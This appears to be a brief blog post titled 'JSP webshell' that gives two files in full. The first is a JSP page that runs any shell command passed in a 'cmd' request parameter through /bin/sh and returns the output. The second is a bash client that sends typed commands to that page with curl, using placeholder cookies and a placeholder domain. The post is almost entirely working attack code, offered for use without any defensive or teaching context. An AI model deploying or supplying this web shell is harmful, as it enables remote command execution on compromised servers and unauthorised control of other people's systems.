# JSP webshell


# cat shell.jsp
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
String getcmd = request.getParameter("cmd");
if (getcmd != null) {
 //out.println("Command: " + getcmd + "<br>");
 String[] cmd = {"/bin/sh", "-c", getcmd};
 Process p = Runtime.getRuntime().exec(cmd);
 OutputStream os = p.getOutputStream();
 InputStream in = p.getInputStream();
 DataInputStream dis = new DataInputStream(in);
 String disr = dis.readLine();
 //out.println("<pre>"); 
 while ( disr != null ) {
  out.println(disr); 
  disr = dis.readLine(); 
 }
 //out.println("</pre>"); 
}
%>
# cat shell.sh
#!/bin/bash

HISTFILE=./file_history
history -r

input=""

while [ "$input" != "exit" ]; do
 read -e -p "> " input
 history -s $input
 curl -k --cookie 'VAR1=VALUE1' --cookie 'VAR2=VALUE2' --data-urlencode "cmd=$input" https://DOMAIN/DIR/shell.jsp
done

history -a

No comments: